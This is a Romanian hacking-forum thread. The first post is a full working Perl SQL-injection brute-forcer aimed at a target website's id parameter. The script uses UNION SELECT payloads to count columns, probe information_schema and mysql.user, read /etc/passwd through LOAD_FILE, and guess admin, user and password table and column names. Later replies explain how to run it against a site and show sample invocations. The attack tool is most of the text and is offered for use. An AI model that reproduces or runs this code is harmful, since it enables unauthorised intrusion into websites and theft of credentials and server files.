ZeroCold Posted February 24, 2012 Report Posted February 24, 2012 #!/usr/bin/perluse LWP::Simple;if(!$ARGV[2]){print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";exit (0);}@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator','administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names','member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors','asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');@nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');if ( $ARGV[0] !~ /^http:/ ){$ARGV[0] = "http://" . $ARGV[0];}if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--"){$cmn.= "+";$cfin.="--";print "\n[+] Comments to use: '--' & '+'";}else{$cmn.= "/**/";$cfin.= "/*";print "\n[+] Comments to use: '/*' & '/**/'";}open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK"){print "\n[!] Skipping the initial check...\n";print WEB "[WEBSITE]:\n\n$ARGV[0]\n";}else{print "\n[!] Checking if the website is vulnerable...\n";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;$response=get($sql)or die("[-] Wrong Website, check it\n");if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/){print "[+] Vulnerable website, script continues...\n";print WEB "[WEBSITE]:\n\n$ARGV[0]\n";}else{print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";exit(1);}}print "\n[!] Looking up columns...\n";for ($column = 0 ; $column < $ARGV[1] ; $column ++){$union.=','.$column;$inyection.=','."0x6c6f67696e70776e7a";if ($column == 0){print WEB "\n[COLUMNS]:\n\n";$inyection = '';$union = '';}$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");if($response =~ /loginpwnz/){$column ++;print "[+] The site has $column columns\n\n";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;print "$sql\n";print WEB "$sql\n";print "\n[!] Checking if Information_Schema exists...";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;$response=get($sql)or die("[-] Impossible to get Information_Schema\n");if($response =~ /loginpwnz/){print "\n[+] Information_Schema available...saving in $ARGV[2]";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";}else{print "\n[-] Information_Schema unavailable";}print "\n[!] Checking if MySQL.User exists...";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;$response=get($sql)or die("[-] Impossible to get MySQL.User\n");if($response =~ /loginpwnz/){print "\n[+] MySQL.User available...saving in $ARGV[2]";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";}else{print "\n[-] MySQL.User unavailable";}while ($loadcont < $column-1){$loadfile.=','.'load_file(0x2f6574632f706173737764)';$loadcont++;}print "\n[!] Checking if it is possible to inject LOAD_FILE...";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");if($response =~ /root:x:/){print "\n[+] LOAD_FILE available...saving in $ARGV[2]";print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";}else{print "\n[-] LOAD_FILE unavailable";}if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T"){print "\n\n[!] Brute forcing tables...";print WEB "\n\n[TABLES]:\n\n";foreach $tabla(@nombretabla){chomp($tabla);$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;$response=get($sql)or die("[-] Impossible to get tables\n");if($response =~ /loginpwnz/){print "\n[+] Table $tabla exists...saving in $ARGV[2]";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;print WEB "$sql\n";}}}if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C"){print "\n\n[!] Table to brute force columns: ";$tabla.='';chomp($tabla);print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";foreach $columna(@nombrecolumna){chomp($columna);$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;$response=get($sql)or die("[-] Impossible to get columns\n");if ($response =~ /loginpwnz/){print "\n[+] Column $columna available...saving in $ARGV[2]";print WEB "$columna\n";}}}print WEB "\n\n\n[*EOF*]";print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";print "## c0ded by Bl4k3 | 2010 ##\n\n";exit (0);}}print "[-] Impossible to find number of columns, try more columns\n\n";print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n";exit (0); Quote
daNNy.bv Posted February 26, 2012 Report Posted February 26, 2012 m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc Quote
ZeroCold Posted February 27, 2012 Author Report Posted February 27, 2012 m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare MultumescNu pot sa fac o prezentare a fiecarui program pe care il postez, timp pierdut.- SQL injection- Brute Force AttackNu o sa iti explice nimeni nimic ca la clasa I, rar gasesti persoane care sa aiba rabdare cu tine si timp. Daca vrei sa inveti, inveti singur. Quote
daNNy.bv Posted February 28, 2012 Report Posted February 28, 2012 cunosc cei doi termeni,dar cum se foloseste codul? Quote
Guest Kovalski Posted February 28, 2012 Report Posted February 28, 2012 este un script de perl.copii acel cod dai vi exemplu.plapesi idai paste la acest codapesi ESCdai :wqdupa care[+] SQL Injection bruteforce By Bl4k3 -[+]-=========================================Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK][WEBSITE]: Website Design | Small Business Web Design | Web.com[COLUMNS]: Limit of columns to check[FILE]: File where save the results[COMMENT]: '/*' o '--' (Without '') (Optional)[-T]: Try to brute force tables (Optional)[-C]: Try to brute force columns (Optional)[-NOCHECK]: Skip the initial check (Optional) Quote
pr00f Posted February 28, 2012 Report Posted February 28, 2012 cunosc cei doi termeni,dar cum se foloseste codul?Creezi un fi?ier .pl, ?i îl rulezi prin „perl script.pl”. Argumentele ?i le afi?eaz? el.$ perl plm.pl hxxp://exemplu.ro/index.php?id= 20 res.txt -- -T -C[+] Comments to use: '--' & '+'[!] Checking if the website is vulnerable...Undefined subroutine &main::get called at plm.pl line 61.Linia 61 nu-mi zice nimic. Quote
speeddemon Posted February 29, 2012 Report Posted February 29, 2012 este un script de perl.copii acel cod dai vi exemplu.plapesi idai paste la acest codapesi ESCdai :wqdupa care[+] SQL Injection bruteforce By Bl4k3 -[+]-=========================================Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK][WEBSITE]: Website Design | Small Business Web Design | Web.com[COLUMNS]: Limit of columns to check[FILE]: File where save the results[COMMENT]: '/*' o '--' (Without '') (Optional)[-T]: Try to brute force tables (Optional)[-C]: Try to brute force columns (Optional)[-NOCHECK]: Skip the initial check (Optional)am inteles totul... Quote
ZeroCold Posted March 2, 2012 Author Report Posted March 2, 2012 (edited) cunosc cei doi termeni,dar cum se foloseste codul?Mini-tutorial Perl/Tk@ps-axl, imagineaza-ti ca scriptul de sus e primul script in perl pe care il vezi, e prima data cand auzi de perl.Citeste ce ai scris tu:este un script de perl.copii acel cod dai vi exemplu.plapesi idai paste la acest codapesi ESCdai :wqdupa care(...)Intelegi ceva? Edited March 2, 2012 by ZeroCold Quote
mrjasdf Posted March 2, 2012 Report Posted March 2, 2012 Cu ce-i diferit asta fata de schemafuzz sau darkmysqli ? a... asta e in perl o.O Quote
u0m3 Posted March 3, 2012 Report Posted March 3, 2012 m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare MultumescAs requested: [Perl] sqli_brute.pl - Pastebin.com Quote
Emisary Posted March 3, 2012 Report Posted March 3, 2012 perl se inchide imediat dupa deschiderea fisierului, doar cu fisierul asta am probleme, altele facute de mine merg...vreo idee? Quote
